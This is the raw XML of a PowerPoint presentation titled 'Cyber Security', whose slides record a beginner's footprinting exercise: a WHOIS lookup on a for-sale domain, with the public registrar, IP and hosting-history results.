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44"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="265" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="268" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="277" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="279" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="282" r:id="rId23"/>
    <p:sldId id="283" r:id="rId24"/>
    <p:sldId id="284" r:id="rId25"/>
    <p:sldId id="285" r:id="rId26"/>
    <p:sldId id="286" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="288" r:id="rId29"/>
    <p:sldId id="289" r:id="rId30"/>
    <p:sldId id="290" r:id="rId31"/>
    <p:sldId id="291" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="293" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="295" r:id="rId36"/>
    <p:sldId id="296" r:id="rId37"/>
    <p:sldId id="298" r:id="rId38"/>
    <p:sldId id="299" r:id="rId39"/>
    <p:sldId id="300" r:id="rId40"/>
    <p:sldId id="301" r:id="rId41"/>
    <p:sldId id="302" r:id="rId42"/>
    <p:sldId id="297" r:id="rId4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91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="126"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viewProps" Target="viewProps.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/></Relationships>
</file>

<file path=ppt/media/image1.jpeg>
</file>

<file path=ppt/media/image2.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A75990-A4A1-4DDE-AA8D-73E60A452DD0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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CD8D-B1D9-4658-A4F0-38CA8D83ED5D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="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077511" y="5410201"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{808C238F-B856-42A4-BC32-194DCC130D5F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023</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4872680-3826-48D8-A0B9-F293E3A564DD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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C0F02A-B435-4587-AE10-6A02865845FD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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DF27A1-9C29-4918-BA16-87149545F673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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7EEE601-4D27-49FF-B099-2799466F7EDA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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4E52469-603F-4B0F-8F23-6B2B143D5424}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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D7781E0-05FC-475E-A14D-85EF9B55E67B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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D8D02C8-8352-4A2E-A3CD-139A8583C932}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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F680581-4B77-41E9-BE55-C3C9C3900A2A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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2C1CB5-A088-4DB4-8A5C-B084F9B2B528}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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3C1328-ADC8-435B-8F5C-D339CD9DD487}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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0256410-64C5-4311-8359-FDA6B61ABBAE}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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018B01E-6E1B-4AFC-A690-27C447C9486E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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852F3D2-503A-4E49-99AD-125A054E178F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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166207-223C-48E4-AE22-548ABC801447}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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941151-B38C-4230-91F0-8A3BB69A056C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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3F6EA29-EE45-46F5-8084-6929433FA14E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023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567B94D-50C4-4558-AAA1-857DDB1A21EF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7/31/2023</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hyperlink" Target="https://twitter.com/ahack_ru" TargetMode="Externa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7" name="Group 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD579530-1077-46B3-BD5C-81BB270A1D5B}"/>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8" name="Rectangle 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBB106A-B366-4349-B59F-E8FBDADD82AC}"/>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9" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113FC03B-24E4-4A3F-9626-CC7F6356BC9E}"/>
                </a:ext>
                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" xmlns=""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5" name="Picture 4" descr="close up of circuit board">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525AE681-57C0-4C44-9E88-A16CDA016EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="30000"/>
          </a:blip>
          <a:srcRect t="6504" b="9202"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5314" y="22202"/>
            <a:ext cx="12188389" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="81" name="Group 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F79A5F-63B5-4802-B39B-BF0F89DDDA15}"/>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2" name="Round Diagonal Corner Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D14BF7-A799-4EDA-8C19-CED0B8EC523E}"/>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83" name="Group 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF292344-73C8-4E53-85C0-8CDB23EB53B9}"/>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reeform 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4781E776-A0A7-4FB6-958B-8389BBA5697D}"/>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5" name="Freeform 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F004D56-F177-45BC-8965-B72DB88A0859}"/>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Freeform 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F2F1F83-817B-4678-B0AE-8FFDC49FC825}"/>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Freeform 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F908EB47-32F4-4E82-BF56-FD25BB07474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Freeform 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0966000D-B975-4E8A-9BF2-EACF2164050E}"/>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reeform 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9554499-6796-4AEE-B012-34A5B9A585A6}"/>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reeform 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DD40864-34BD-491F-B591-180E7B32C121}"/>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Freeform 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2623F54C-4373-4D30-90DB-3129BDDF54AC}"/>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Freeform 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FF42884-D4B2-462F-9FA7-4FA892532245}"/>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Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F4D4BA-37F5-4D54-BDFF-733F621D5DB0}"/>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94" name="Freeform 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E4A0E5-0441-4563-A947-12A5781105E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5" name="Freeform 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8D89B4-AD1B-410A-870B-1042E075A04E}"/>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6" name="Freeform 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFC54570-9F45-44E6-AC94-4B3192D44B28}"/>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7" name="Freeform 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A976F76C-4BBB-4CD4-9270-5E4E8802BF7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8" name="Freeform 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06081E5F-35E2-4E9E-A0DA-9E2F769C4CE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9" name="Freeform 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7B4F78-1391-433D-AAE5-0FA8B8EE1817}"/>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0" name="Freeform 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF63F42B-29ED-4285-99D1-5FA657DA929D}"/>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1" name="Freeform 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7A6053-A7CF-4785-B396-6F70D6EBE9B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2" name="Freeform 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6337518-A10D-47A5-BD86-6D1F3FAF3C99}"/>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3" name="Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7591C37F-6498-4992-992D-D413A84752D3}"/>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le 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED476017-D224-40AE-B921-67525450151A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2653374" y="2563812"/>
            <a:ext cx="6858000" cy="1367896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CYBER SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51F013D4-CBD9-4FC1-AF91-2301A704488B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667001" y="2282825"/>
            <a:ext cx="6857999" cy="2272242"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Power point presentation on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13371922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43AB3A2-D52D-4204-B2A7-8B6DDF71FEEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3041583" y="615251"/>
            <a:ext cx="6102416" cy="5940088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>                                     DAY -2</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Foot printing and reconnaissance</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step-1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Search for domain name </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>I took </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>https://marketplace.appsmart.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step-2 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Osint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> frame work </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step-3</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Domain name - who is records - Domain tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step-4 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Paste the domain name </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step-5 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>I got results of this site </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Step-6 </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Registrant Domain Admin / This Domain is For Sale</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Registrant Org HugeDomains.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Registrant Country US</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Registrar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>TurnCommerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>, Inc. DBA NameBright.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33673391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425B5F3-153B-4D39-A1B9-3A173AB98E47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3080220" y="394692"/>
            <a:ext cx="6102416" cy="6463308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IANA ID: 1441</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URL: http://www.NameBright.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Server: whois.NameBright.com(p)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar Status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>clientTransferProhibited</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Dates 4,250 days old</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Created on 2011-11-21</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Expires on 2025-11-21</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Updated on 2020-11-15   </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Name Servers NSG1.NAMEBRIGHTDNS.COM (has 4,700,935 domains)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>NSG2.NAMEBRIGHTDNS.COM (has 4,700,935 domains)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  Tech Contact Domain Admin / This Domain is For Sale</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HugeDomains.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2635 Walnut Street,</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Denver, CO, 80205, US</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(p)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IP Address 52.71.57.184 - 813,907 other sites hosted on this server</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  IP Location United States - Virginia - Ashburn - Amazon Technologies Inc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ASN United States AS14618 AMAZON-AES, US (registered Nov 04, 2005)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1415858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1E25F43-67AD-4679-B77A-FEAADED7BC27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3119919" y="289451"/>
            <a:ext cx="6102416" cy="6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Domain Status Registered And No Website</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IP History 227 changes on 227 unique IP addresses over 14 years   </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar History 4 registrars with 2 drops   </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hosting History 10 changes on 6 unique name servers over 14 years   </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Record ( last updated on 2023-07-12 )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Domain Name: AppsSmart.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registry Domain ID: 1688302902_DOMAIN_COM-VRSN</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Registrar WHOIS server: whois.NameBright.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
